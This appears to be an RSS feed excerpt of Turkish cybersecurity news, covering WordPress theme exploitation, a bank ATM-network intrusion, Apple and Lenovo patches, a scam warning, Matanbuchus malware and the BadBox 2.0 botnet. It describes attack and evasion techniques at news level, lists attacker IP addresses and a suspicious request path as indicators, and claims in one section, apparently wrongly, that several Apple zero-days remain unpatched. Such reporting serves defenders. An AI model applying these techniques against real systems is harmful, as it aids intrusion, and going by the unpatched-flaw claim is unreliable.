<p><em>Wordfence</em> tarafından tespit edilen saldırılar, Alone temasının <code>alone_import_pack_install_plugin()</code> işlevindeki güvenlik kontrol eksikliğinden kaynaklanıyor. Bu işlev, WordPress’teki <code>wp_ajax_nopriv_</code> kancası aracılığıyla yetkisiz kullanıcıların dış URL’lerden eklenti kurmasına izin veriyor.</p>
<p>Saldırganlar, bu açığı kullanarak şifre korumalı PHP arka kapılar, ZIP arşivlerine gizlenmiş web shell’ler veya veritabanına erişim sağlayan dosya yöneticileri yüklüyor. Ayrıca, gizli yönetici hesapları oluşturularak kalıcı erişim sağlanıyor.</p>
<h3>İstatistikler ve Tespit Edilen Saldırılar</h3>
<p>Wordfence, açığın kamuya açıklanmasından önce saldırıların başladığını ve şu ana kadar <strong>120 binden fazla</strong> istismar girişiminin engellendiğini açıkladı. Saldırı belirtileri arasında yeni yönetici kullanıcıların oluşması, şüpheli ZIP dosyaları ve olağandışı <code>admin-ajax.php?action=alone_import_pack_install_plugin</code> HTTP istekleri yer alıyor.</p>
<h3>Engellenmesi Önerilen IP Adresleri</h3>
<ul>
<li>193.84.71.244</li>
<li>87.120.92.24</li>
<li>146.19.213.18</li>
<li>2a0b:4141:820:752::2</li>
</ul>
<p>Sistem yöneticilerinin bu IP adreslerini engellemesi öneriliyor.</p>
<h3>Yama ve İletişim Problemi</h3>
<p>Alone temasının 7.8.3 ve önceki sürümleri saldırıya açık durumda. Geliştirici Bearsthemes, <strong>16 Haziran 2025</strong>’te 7.8.5 sürümüyle açığı yamaladı. Ancak Wordfence, ilk bildirimi <strong>30 Mayıs</strong>’ta yapmasına rağmen geliştiriciden yanıt alamadığı için durumu <strong>12 Haziran</strong>’da Envato Market ekibine iletmek zorunda kaldı.</p>
<h3>Temanın Kullanım Alanları ve Benzer Olaylar</h3>
<p>Alone teması, Envato pazarında yaklaşık 10 bin satışa sahip olup, özellikle yardım kuruluşları, sivil toplum örgütleri ve bağış platformları tarafından tercih ediliyor.</p>
<p>Geçen ay, Motors adlı başka bir popüler WordPress temasında da kullanıcı doğrulama açığı kullanılarak site yöneticisi hesapları ele geçirilmişti.</p>
<p>Uzmanlar, WordPress kullanıcılarını temaların yanı sıra eklenti ve çekirdek bileşenleri düzenli olarak güncellemeleri konusunda uyarıyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>LightBasin grubu ATM ağına 4G’li Raspberry Pi yerleştirerek banka sistemine sızmaya çalıştı</title>
<link>https://www.ajansexpres.com.tr/lightbasin-grubu-atm-agina-4gli-raspberry-pi-yerlestirerek-banka-sistemine-sizmaya-calisti</link>
<guid>https://www.ajansexpres.com.tr/lightbasin-grubu-atm-agina-4gli-raspberry-pi-yerlestirerek-banka-sistemine-sizmaya-calisti</guid>
<description><![CDATA[ Siber tehdit grubu LightBasin (UNC2891), fiziksel olarak bir bankanın ATM ağ anahtarına bağladığı 4G bağlantılı Raspberry Pi cihazıyla ağ içi hareketlilik sağladı. Grup, ATM yetkilendirmesini taklit ederek sahte para çekimi hedefledi ancak plan başarısız oldu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894833b7075d.webp" length="25082" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:07 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>LightBasin bankaya nasıl sızdı, Raspberry Pi cihazı nasıl kullanıldı, saldırganların amacı neydi, saldırı neden başarısız oldu</media:keywords>
<content:encoded><![CDATA[<h2>LightBasin (UNC2891) Grubundan Banka Sistemlerine Gelişmiş Hibrit Saldırı</h2>
<p>Uluslararası düzeyde bankacılık sistemlerine yönelik siber saldırılarıyla tanınan <strong>LightBasin (UNC2891)</strong> grubu, fiziksel erişim sağladığı bir bankada sofistike bir hibrit saldırı gerçekleştirdi. Grup, ATM ağına bağlı bir ağ anahtarına <em>4G modemli Raspberry Pi</em> cihazı yerleştirerek güvenlik duvarlarını aşmayı ve iç ağa kalıcı uzaktan erişim sağlamayı başardı.</p>
<h3>Saldırı Tespiti ve Amaç</h3>
<p><em>Group-IB</em> güvenlik firması, bankanın ağında tespit ettiği şüpheli trafik üzerine yaptığı incelemede bu saldırıyı ortaya çıkardı. Saldırının hedefi, ATM işlemlerini taklit ederek haksız nakit para çekimi gerçekleştirmekti.</p>
<h3>TinyShell ile Gizli Komuta Kontrol (C2) Bağlantısı</h3>
<p>Saldırganlar, Raspberry Pi cihazını <strong>TinyShell</strong> adlı açık kaynaklı arka kapı yazılımı ile komuta ve kontrol (C2) merkezi olarak yapılandırdı. Cihaz, 4G bağlantısıyla dış dünya ile gizli iletişim kurdu.</p>
<p>Ağda yatay hareketler gerçekleştirilerek Banka'nın Ağ İzleme Sunucusu’na ve ardından doğrudan internet erişimi bulunan E-posta Sunucusu’na erişildi. Böylece saldırganlar iç ağda kalıcı ve geniş kapsamlı erişim sağladı.</p>
<h3>İleri Teknikler ve Gizlenme Yöntemleri</h3>
<p>Zararlı yazılımlar, Linux sistemlerinde yaygın olan “LightDM” ekran yöneticisine benzer şekilde “lightdm” ismiyle kaydedilerek tespit edilmekten kaçınıldı. Ayrıca <code>tmpfs</code> ve <code>ext4</code> dosya sistemleri kullanılarak zararlı süreçlerin <code>/proc/[pid]</code> yollarına bağlanması sağlandı; bu teknik adli analiz araçlarının işlem geçmişini görmesini engelledi.</p>
<h3>Son Hedef: Caketap Rootkit</h3>
<p>LightBasin’in nihai hedefi, Oracle Solaris tabanlı sistemlere <strong>Caketap</strong> adlı özel rootkit’i kurmaktı. Bu rootkit, ödeme sistemlerindeki HSM (Hardware Security Module) yanıtlarını manipüle ederek reddedilen işlemlerin onaylanmış gibi görünmesini sağlıyordu.</p>
<p>Ancak saldırganlar bu amaca ulaşamadan tespit edildi. Group-IB uzmanları, başarılı olsaydı büyük maddi kayıplar ve ciddi güvenlik ihlalleri yaşanabileceğini vurguladı.</p>
<h3>Fiziksel Sızma Şüpheleri ve Ağ İletişimi</h3>
<p>Saldırganların bankanın şubesine fiziksel erişim sağlayıp sağlamadığı veya bir içeriden destek alıp almadığı henüz kesinleşmedi. Ağ izleme sunucusunun her 600 saniyede bir, Raspberry Pi cihazına 929 numaralı port üzerinden veri gönderdiği belirlendi; bu da cihazın ağda pivot noktası olarak kullanıldığını gösteriyor.</p>
<h3>LightBasin Grubunun Geçmişi</h3>
<p>2016’dan beri finans ve telekom sektörlerine yönelik karmaşık siber operasyonlar yürüten LightBasin, Unix sistemleri ve mobil ağ altyapılarına yönelik çok sayıda saldırı gerçekleştirmiş gelişmiş bir tehdit aktörüdür.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Apple, Chrome kullanıcılarını hedef alan sıfır gün saldırısında kullanılan güvenlik açığını yamadı</title>
<link>https://www.ajansexpres.com.tr/apple-chrome-kullanicilarini-hedef-alan-sifir-gun-saldirisinda-kullanilan-guvenlik-acigini-yamadi</link>
<guid>https://www.ajansexpres.com.tr/apple-chrome-kullanicilarini-hedef-alan-sifir-gun-saldirisinda-kullanilan-guvenlik-acigini-yamadi</guid>
<description><![CDATA[ Apple, Google Chrome tarayıcısındaki GPU süreçlerini etkileyen ve kötü niyetli HTML sayfalarıyla uzaktan kod çalıştırılmasına yol açabilen CVE-2025-6558 numaralı kritik güvenlik açığına karşı güncellemeler yayımladı. Açığın devlet destekli tehdit gruplarınca istismar edildiği bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894833743c41.webp" length="36620" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:03 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-6558 açığı ne tür saldırılara olanak tanıyor, hangi Apple cihazları etkileniyor, bu açık devlet destekli gruplar tarafından nasıl kullanıldı, CISA federal kurumlara ne zaman yama zorunluluğu getirdi</media:keywords>
<content:encoded><![CDATA[<h2>Apple, CVE-2025-6558 Sıfır Gün Açığını Kapatmak İçin Güvenlik Güncellemeleri Yayınladı</h2>
<p>Apple, Chrome kullanıcılarını hedef alan ve <strong>CVE-2025-6558</strong> numarasıyla izlenen yüksek riskli sıfır gün güvenlik açığını düzeltmek amacıyla kapsamlı güncellemeler yayımladı. Bu açık, Apple’ın çoğu platformunu etkileyen <em>ANGLE</em> (Almost Native Graphics Layer Engine) adlı grafik soyutlama katmanında tespit edildi.</p>
<h3>Açığın Detayları ve Riskleri</h3>
<p>ANGLE bileşeni, OpenGL ES API çağrılarını Direct3D, Metal, Vulkan ve OpenGL gibi grafik API’lerine dönüştürür. <strong>CVE-2025-6558</strong>, özel hazırlanmış HTML sayfaları aracılığıyla tarayıcının GPU sürecinde rastgele kod çalıştırılmasına imkân veriyor. Bu da tarayıcı sandbox güvenlik sınırlarının aşılmasına ve sistem üzerinde potansiyel tam kontrol sağlanmasına yol açabiliyor.</p>
<h3>Keşif ve Yama Süreci</h3>
<p>Google Tehdit Analiz Grubu (TAG) araştırmacıları Vlad Stolyarov ve Clément Lecigne tarafından Haziran 2025’te keşfedilen açık, 15 Temmuz’da Chrome ekibine bildirildi ve hızla yamalandı. Google, bu açığın devlet destekli tehdit aktörleri tarafından aktif şekilde kullanıldığını doğruladı.</p>
<h3>Apple’ın Güncellemeleri</h3>
<ul>
<li><strong>iOS 18.6 ve iPadOS 18.6:</strong> iPhone XS ve sonrası, çeşitli iPad Pro, iPad Air ve iPad mini modelleri</li>
<li><strong>macOS Sequoia 15.6</strong></li>
<li><strong>iPadOS 17.7.9:</strong> iPad Pro 12.9 inç 2. nesil, 10.5 inç modeli ve iPad 6. nesil</li>
<li><strong>tvOS 18.6:</strong> Apple TV HD ve tüm Apple TV 4K modelleri</li>
<li><strong>visionOS 2.6:</strong> Apple Vision Pro</li>
<li><strong>watchOS 11.6:</strong> Apple Watch Series 6 ve sonrası</li>
</ul>
<p>Apple, güncellemeye ilişkin açıklamasında “Kötü amaçlı web içeriğinin işlenmesi, Safari’nin beklenmedik şekilde çökmesine neden olabilir” ifadelerini kullandı ve açığın yalnızca Apple yazılımlarında değil, aynı zamanda açık kaynak projelerde de bulunduğunu belirtti.</p>
<h3>CISA’dan Zorunlu Güncelleme Talimatı</h3>
<p>ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), <strong>CVE-2025-6558</strong> açığını aktif olarak istismar edilen güvenlik açıkları listesine ekleyerek federal kurumlara 12 Ağustos 2025’e kadar yama uygulamalarını zorunlu kıldı. Ayrıca, tüm sistem yöneticilerine de öncelikli olarak bu açığın kapatılması çağrısı yapıldı.</p>
<h3>Apple’ın 2025’te Düzeltmediği Diğer Sıfır Gün Açıkları</h3>
<p>2025 yılı başından itibaren Apple tarafından halen yamalanmamış olan diğer kritik sıfır gün açıkları şunlardır:</p>
<ul>
<li>CVE-2025-24085 (Ocak 2025)</li>
<li>CVE-2025-24200 (Şubat 2025)</li>
<li>CVE-2025-24201 (Mart 2025)</li>
<li>CVE-2025-31200 ve CVE-2025-31201 (Nisan 2025)</li>
</ul>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Lenovo, UEFI sistemlerinde Secure Boot&amp;apos;u atlatmaya yol açan kritik BIOS açıkları için güncelleme yayımladı</title>
<link>https://www.ajansexpres.com.tr/lenovo-uefi-sistemlerinde-secure-bootu-atlatmaya-yol-acan-kritik-bios-aciklari-icin-guncelleme-yayimladi</link>
<guid>https://www.ajansexpres.com.tr/lenovo-uefi-sistemlerinde-secure-bootu-atlatmaya-yol-acan-kritik-bios-aciklari-icin-guncelleme-yayimladi</guid>
<description><![CDATA[ Lenovo, InsydeH2O UEFI firmware üzerinde tespit edilen ve SMM ayrıcalıklarıyla kötü amaçlı kod çalıştırılmasına neden olabilecek altı yüksek riskli güvenlik açığı için BIOS güncellemeleri yayımladı. Açıklar, bazı IdeaCentre ve Yoga AIO modellerini etkiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689483331ad58.webp" length="36302" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:42:58 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Lenovo BIOS açıkları hangi cihazları etkiliyor, SMM modunda ne tür istismarlar yapılabiliyor, güncellemeler ne zaman yayımlanacak, Secure Boot atlatması nasıl gerçekleşiyor</media:keywords>
<content:encoded><![CDATA[<h2>Lenovo, Secure Boot Mekanizmasını Atlatan Kritik BIOS Açıklarını Gidermek İçin Güncellemeler Yayınladı</h2>
<p>Lenovo, belirli hepsi bir arada (All-in-One) masaüstü bilgisayar modellerinde bulunan ve Secure Boot mekanizmasını aşmaya imkân tanıyan <strong>altı yüksek önem derecesine sahip BIOS açığını</strong> kapatmak amacıyla yeni firmware güncellemeleri yayımladı.</p>
<h3>Güvenlik Açıklarının Kaynağı ve Etkisi</h3>
<p>Açıklar, Lenovo için Insyde tarafından özelleştirilen <em>InsydeH2O UEFI</em> firmware kodlarında bulunuyor. Saldırganlar için büyük tehlike arz eden bu açıklar, işletim sistemi yüklenmeden önce çalışan ve yüksek kalıcılığa sahip <strong>System Management Mode (SMM)</strong> katmanında yer alıyor. Bu sayede, kötü niyetli kişiler sisteme derinlemesine erişim sağlayabiliyor.</p>
<h3>Etkilenen Modeller</h3>
<ul>
<li>IdeaCentre AIO 3 24ARR9</li>
<li>IdeaCentre AIO 3 27ARR9</li>
<li>Yoga AIO 27IAH10</li>
<li>Yoga AIO 32ILL10</li>
<li>Yoga AIO 32IRH8</li>
</ul>
<h3>Tespit Edilen Güvenlik Açıkları ve CVSS Puanları</h3>
<ul>
<li><strong>CVE-2025-4421:</strong> Doğrulanmamış RSI kaydı ile SMRAM belleğe yazım yapılabiliyor. (CVSS: 8.2)</li>
<li><strong>CVE-2025-4422:</strong> SMM bellekte bozulmaya yol açan işleyici açığı. (CVSS: 8.2)</li>
<li><strong>CVE-2025-4423:</strong> SMM içerisinde keyfi bellek yazımı ile kod çalıştırma. (CVSS: 8.2)</li>
<li><strong>CVE-2025-4424:</strong> Yanıltıcı girişlerle firmware ayarlarının değiştirilmesi. (CVSS: 6.0)</li>
<li><strong>CVE-2025-4425:</strong> Stack buffer overflow ile SMM yetki yükselmesi ve kod çalıştırma. (CVSS: 8.2)</li>
<li><strong>CVE-2025-4426:</strong> SMRAM içeriğinin sızdırılması yoluyla hassas veri açığa çıkması. (CVSS: 6.0)</li>
</ul>
<h3>Bildirim ve Koordinasyon Süreci</h3>
<p>Binarly güvenlik araştırma firması, bu açıkları 8 Nisan 2025 tarihinde Lenovo’ya bildirdi. Lenovo, 16 Haziran’da durumu doğruladı ve 90 günlük koordineli açıklama sürecinin ardından 29 Temmuz 2025’te kamuoyuna duyurdu.</p>
<h3>Güncellemeler ve Tavsiyeler</h3>
<p><strong>IdeaCentre AIO 3</strong> modelleri için <em>O6BKT1AA</em> firmware sürümü yayımlandı ve kullanıcılara en kısa sürede güncelleme yapmaları öneriliyor. <strong>Yoga AIO</strong> modelleri için güncellemeler henüz yayımlanmadı; Lenovo, bu yamaların 30 Eylül – 30 Kasım 2025 tarihleri arasında sunulacağını bildirdi.</p>
<p>Insyde tarafından yapılan açıklamada, bu açıkların sadece Lenovo için geliştirilmiş özelleştirilmiş InsydeH2O firmware sürümlerinde bulunduğu, tüm InsydeH2O kullanan sistemlerin etkilenmediği vurgulandı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Kayseri Büyükşehir’den Dolandırıcılık Uyarısı: Yardım Başvuruları Sadece Resmî Siteden Yapılıyor</title>
<link>https://www.ajansexpres.com.tr/kayseri-buyuksehirden-dolandiricilik-uyarisi-yardim-basvurulari-sadece-resmi-siteden-yapiliyor</link>
<guid>https://www.ajansexpres.com.tr/kayseri-buyuksehirden-dolandiricilik-uyarisi-yardim-basvurulari-sadece-resmi-siteden-yapiliyor</guid>
<description><![CDATA[ Kayseri Büyükşehir Belediyesi, kırtasiye ve beslenme yardımı başvurularıyla ilgili dolandırıcılık girişimlerine karşı vatandaşları uyardı. Yardım başvurularının yalnızca belediyenin resmi internet sitesi www.kayseri.bel.tr üzerinden yapılabileceği açıklandı. Sahte form ve mesajlara karşı dikkatli olunması istendi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894832d2c22e.webp" length="56312" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:42:53 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Yardım başvurusu dolandırıcılığı nasıl yapılıyor, resmi başvurular hangi siteden yapılıyor, hangi bilgilere dikkat edilmeli, dolandırıcılık şüphesi olan durumlarda nereye başvurulmalı</media:keywords>
<content:encoded><![CDATA[<p data-start="446" data-end="812">Kayseri Büyükşehir Belediyesi, 2025-2026 eğitim-öğretim yılı kapsamında yapılacak kırtasiye ve beslenme yardımı başvurularını fırsata çevirmeye çalışan dolandırıcılara karşı kamuoyuna uyarıda bulundu. Belediyeden yapılan açıklamada, vatandaşlardan kişisel bilgi isteyen sahte kişiler ve kurumlar konusunda dikkatli olunması gerektiği vurgulandı.</p>
<p data-start="814" data-end="1119">Açıklamaya göre, bazı art niyetli kişilerin yardım başvurusu bahanesiyle vatandaşlardan kimlik ve banka bilgileri talep ettiği, sahte formlar aracılığıyla hesap açtırmaya çalıştıkları belirlendi. Bu girişimlerin dolandırıcılık amacı taşıdığı ve resmi kurumlarla hiçbir bağlantısının olmadığı ifade edildi.</p>
<p data-start="1121" data-end="1406">Başvuruların sadece<span> </span><a data-start="1141" data-end="1159" rel="noopener" target="_new" class="" href=" üzerinden yapılabileceği hatırlatıldı. İhtiyaç sahibi vatandaşlar, internet sitesindeki “Online Hizmetler” menüsünde yer alan “Kırtasiye Yardımı” bölümü üzerinden 1 Ağustos – 17 Ağustos 2025 tarihleri arasında başvuru gerçekleştirebilecek.</p>
<p data-start="1408" data-end="1655">Belediye, vatandaşların telefon, kısa mesaj veya sosyal medya yoluyla yapılan yönlendirmelere itibar etmemeleri gerektiğini belirtti. Şüpheli durumlarla karşılaşılması halinde ise vakit kaybetmeden emniyet birimlerine başvurulması çağrısı yapıldı.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft Teams üzerinden sahte yardım masası aramalarıyla Matanbuchus zararlısı yayılıyor</title>
<link>https://www.ajansexpres.com.tr/microsoft-teams-uzerinden-sahte-yardim-masasi-aramalariyla-matanbuchus-zararlisi-yayiliyor</link>
<guid>https://www.ajansexpres.com.tr/microsoft-teams-uzerinden-sahte-yardim-masasi-aramalariyla-matanbuchus-zararlisi-yayiliyor</guid>
<description><![CDATA[ Matanbuchus zararlısı, Microsoft Teams üzerinden yapılan sosyal mühendislik saldırılarıyla dağıtılmaya başlandı. Saldırganlar, BT destek personeli kılığına girerek hedeflerin cihazlarına uzaktan erişim sağlıyor ve zararlı yazılımı sistem belleğinde gizlice çalıştırıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d3436e1bd.webp" length="27074" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:31:31 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Matanbuchus nasıl çalışıyor, saldırganlar Microsoft Teamsi nasıl kullanıyor, Matanbuchus 3.0 ne gibi yenilikler içeriyor, sistem yöneticileri hangi önlemleri almalı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="422" data-end="719">Microsoft Teams platformu, son dönemde Matanbuchus adlı zararlı yazılımın dağıtımı için sosyal mühendislik saldırılarında kullanılmaya başlandı. Zararlı yazılım, sahte BT destek personeli gibi davranan saldırganlar tarafından yapılan Teams sesli aramaları aracılığıyla hedef sistemlere yükleniyor.</p>
<p data-start="721" data-end="1138">Matanbuchus, ilk olarak 2021 yılında karanlık ağda tanıtılan bir <strong data-start="786" data-end="817">malware-as-a-service (MaaS)</strong> hizmeti olarak dikkat çekmişti. Windows sistemlerinde çalışan bu zararlı yazılım, yüklediği kötü amaçlı bileşenleri doğrudan bellekte çalıştırarak antivirüs yazılımlarının tespitinden kaçabiliyor. Yazılım, daha önce 2022 yılında büyük çaplı bir spam kampanyasında Cobalt Strike bileşenlerini dağıtmak için kullanılmıştı.</p>
<p data-start="1140" data-end="1570"><strong data-start="1140" data-end="1186">Sahte BT çağrılarıyla sistemlere sızılıyor</strong><br data-start="1186" data-end="1189">Morphisec adlı güvenlik firmasına göre, Matanbuchus'un yeni sürümü olan 3.0 versiyonunda Microsoft Teams üzerinden saldırılar daha yaygın hale geldi. Saldırganlar, hedef kullanıcıya harici bir Teams çağrısı başlatarak kendilerini BT destek personeli gibi tanıtıyor. Ardından, hedef kullanıcıdan Windows’un yerleşik uzaktan yardım aracı olan <strong data-start="1530" data-end="1546">Quick Assist</strong>’i başlatması isteniyor.</p>
<p data-start="1572" data-end="1821">Quick Assist üzerinden erişim sağlandıktan sonra kullanıcıdan bir PowerShell komutu çalıştırması isteniyor. Bu komut, üç dosya içeren bir ZIP arşivini indirip çıkararak, <strong data-start="1742" data-end="1762">DLL side-loading</strong> yöntemiyle Matanbuchus zararlısının yüklenmesini sağlıyor.</p>
<p data-start="1823" data-end="2158"><strong data-start="1823" data-end="1855">Gelişmiş gizlenme yöntemleri</strong><br data-start="1855" data-end="1858">Matanbuchus 3.0 sürümü, önceki versiyonlara kıyasla daha gelişmiş gizlenme ve tespit önleme özellikleri içeriyor. Komut ve kontrol iletişimi RC4 yerine <strong data-start="2010" data-end="2021">Salsa20</strong> algoritmasıyla sağlanıyor. Zararlı yazılım, yalnızca belirli bölge ve sistemlerde çalışmak üzere <strong data-start="2119" data-end="2135">anti-sandbox</strong> kontrolleri uyguluyor.</p>
<p data-start="2160" data-end="2401">Windows API çağrıları yerine doğrudan <strong data-start="2198" data-end="2209">syscall</strong>’lar aracılığıyla işlem yapan zararlı, güvenlik yazılımlarını atlatmayı hedefliyor. Bu işlemler, analizden kaçmak için <strong data-start="2328" data-end="2343">MurmurHash3</strong> adlı non-kriptografik özetleme algoritmasıyla gizleniyor.</p>
<p data-start="2403" data-end="2662">Zararlı yazılımın sistemde çalıştıktan sonraki yetenekleri arasında, PowerShell, CMD, EXE, DLL, MSI ve shellcode dosyalarını çalıştırabilme, kullanıcı bilgilerini toplama ve güvenlik yazılımlarını tespit ederek saldırı yöntemini buna göre ayarlama yer alıyor.</p>
<p data-start="2664" data-end="2942"><strong data-start="2664" data-end="2694">Tehdit analizi ve uyarılar</strong><br data-start="2694" data-end="2697">Morphisec tarafından yapılan teknik analizde, Matanbuchus’un önemli ölçüde gelişmiş bir tehdit haline geldiği belirtiliyor. Şirket, zararlı yazılım örnekleri ve kullanıldığı alan adlarını içeren istismar göstergelerini (IOC) kamuoyuyla paylaştı.</p>
<p data-start="2944" data-end="3259">Geçmişte de DarkGate zararlısının Microsoft Teams üzerinden benzer yollarla dağıtıldığı ve dış erişim ayarları zayıf olan kuruluşların hedef alındığı biliniyor. Microsoft Teams’in sosyal mühendislik saldırılarında kullanımının artması, özellikle dış kaynaklı erişim ayarlarının gözden geçirilmesini gerekli kılıyor.</p>
<p data-start="3266" data-end="3448"><strong data-start="3266" data-end="3278"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Google, 10 milyon cihazı etkileyen BadBox 2.0 botnet ağına karşı dava açtı</title>
<link>https://www.ajansexpres.com.tr/google-10-milyon-cihazi-etkileyen-badbox-20-botnet-agina-karsi-dava-acti</link>
<guid>https://www.ajansexpres.com.tr/google-10-milyon-cihazi-etkileyen-badbox-20-botnet-agina-karsi-dava-acti</guid>
<description><![CDATA[ Google, Android cihazları hedef alan ve reklam dolandırıcılığı üzerinden gelir elde eden BadBox 2.0 adlı zararlı yazılım ağını durdurmak için ABD&#039;de dava açtı. Şirket, Çin bağlantılı olduğu düşünülen isimsiz failleri RICO ve Bilişim Suçları Yasası kapsamında suçluyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d33f85c1a.webp" length="45124" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:31:27 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>BadBox 2.0 nasıl yayılıyor, reklam dolandırıcılığı nasıl işliyor, Google bu saldırılara nasıl yanıt verdi, davada hangi yasalar uygulanıyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="404" data-end="675">Google, dünya çapında 10 milyondan fazla Android cihazı etkileyen <strong data-start="470" data-end="484">BadBox 2.0</strong> botnet operasyonunu durdurmak amacıyla ABD'de dava açtı. Şirket, failleri belirlenemeyen siber suçluları, reklam platformlarına yönelik organize dolandırıcılık faaliyeti yürütmekle suçluyor.</p>
<p data-start="677" data-end="1088">BadBox 2.0, Android Open Source Project (AOSP) tabanlı cihazlarda çalışan bir zararlı yazılım ağı. Saldırganlar, düşük maliyetli AOSP cihazları (akıllı TV’ler, medya kutuları, vb.) satın alarak işletim sistemini değiştiriyor ve <strong data-start="905" data-end="968">BadBox 2.0 zararlısını yüklü şekilde yeniden satışa sunuyor</strong>. Ayrıca kullanıcılar, zararlı yazılım içeren uygulamaları indirerek de farkında olmadan cihazlarını enfekte edebiliyor.</p>
<p data-start="1090" data-end="1421">Zararlı yazılım, cihazlara kurulduktan sonra saldırganların kontrolündeki komut sunucularına (C2) bağlanıyor ve verilen komutları çalıştırarak cihazı bir botnete dahil ediyor. Enfekte cihazlar ya <strong data-start="1286" data-end="1348">siber suçlulara vekil internet erişimi (residential proxy)</strong> olarak satılıyor ya da <strong data-start="1372" data-end="1398">reklam dolandırıcılığı</strong> amacıyla kullanılıyor.</p>
<p data-start="1423" data-end="1475"><strong data-start="1423" data-end="1473">Reklam dolandırıcılığı üç aşamalı yürütülüyor:</strong></p>
<ol data-start="1476" data-end="1940">
<li data-start="1476" data-end="1609">
<p data-start="1479" data-end="1609"><strong data-start="1479" data-end="1508">Gizli reklam görüntüleme:</strong> Kötü niyetli kopya uygulamalar (evil twin apps) arka planda sessizce Google reklamlarını yüklüyor.</p>
</li>
<li data-start="1610" data-end="1771">
<p data-start="1613" data-end="1771"><strong data-start="1613" data-end="1650">Web tabanlı oyun dolandırıcılığı:</strong> Cihazlar, görünmeyen tarayıcılar üzerinden otomatik olarak oyun sitelerini çalıştırıp reklam gösterimlerini artırıyor.</p>
</li>
<li data-start="1772" data-end="1940">
<p data-start="1775" data-end="1940"><strong data-start="1775" data-end="1809">Arama tıklama dolandırıcılığı:</strong> Cihazlar, reklam içeren sahte arama sonuçlarını tetikleyerek tıklama başına gelir elde eden yayıncı hesaplarına para kazandırıyor.</p>
</li>
</ol>
<p data-start="1942" data-end="2178">Google, <strong data-start="1950" data-end="2016">New York eyaletinde 170.000'den fazla cihazın enfekte olduğunu</strong> ve platformlarına bağlı <strong data-start="2041" data-end="2096">binlerce yayıncı hesabının devre dışı bırakıldığını</strong> açıkladı. Ancak şirket, ağın halen aktif olduğunu ve hızla büyüdüğünü belirtiyor.</p>
<p data-start="2180" data-end="2621">Google’ın mahkemeye sunduğu şikayette, botnetin <strong data-start="2228" data-end="2333">2024 sonunda Almanya'nın DNS sorgularını sinkhole yöntemiyle keserek orijinal BadBox ağını durdurduğu</strong> ancak saldırganların bu engeli aşarak <strong data-start="2372" data-end="2412">BadBox 2.0 sürümünü yayına aldıkları</strong> ifade ediliyor. Şirket, bu ağın durdurulmazsa daha fazla cihaza bulaşarak yeni zararlı yazılımlar üretmeye devam edeceğini ve kendilerinin her yıl büyük miktarda kaynak harcamak zorunda kalacağını belirtiyor.</p>
<p data-start="2623" data-end="2968"><strong data-start="2623" data-end="2655">RICO ve CFAA kapsamında dava</strong><br data-start="2655" data-end="2658">Google, faillerin Çin'de ikamet ettiğini düşündüğü için kimlikleri tespit edilemeyen bu kişilere karşı <strong data-start="2761" data-end="2798">ABD Bilişim Suçları Yasası (CFAA)</strong> ve <strong data-start="2802" data-end="2846">Organize Suçlarla Mücadele Yasası (RICO)</strong> kapsamında dava açtı. Şirket, zararın tazmini ve botnet altyapısının kalıcı olarak devre dışı bırakılmasını talep ediyor.</p>
<p data-start="2970" data-end="3076">Dava dosyasında, siber suç operasyonuna ait olduğu tespit edilen <strong data-start="3035" data-end="3061">100’den fazla alan adı</strong> da yer alıyor.</p>
<p data-start="3083" data-end="3239"><strong data-start="3083" data-end="3095"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Yeni LameHug zararlısı, Windows sistemlerde veri hırsızlığı için yapay zekâ destekli komutlar üretiyor</title>
<link>https://www.ajansexpres.com.tr/yeni-lamehug-zararlisi-windows-sistemlerde-veri-hirsizligi-icin-yapay-zeka-destekli-komutlar-uretiyor</link>
<guid>https://www.ajansexpres.com.tr/yeni-lamehug-zararlisi-windows-sistemlerde-veri-hirsizligi-icin-yapay-zeka-destekli-komutlar-uretiyor</guid>
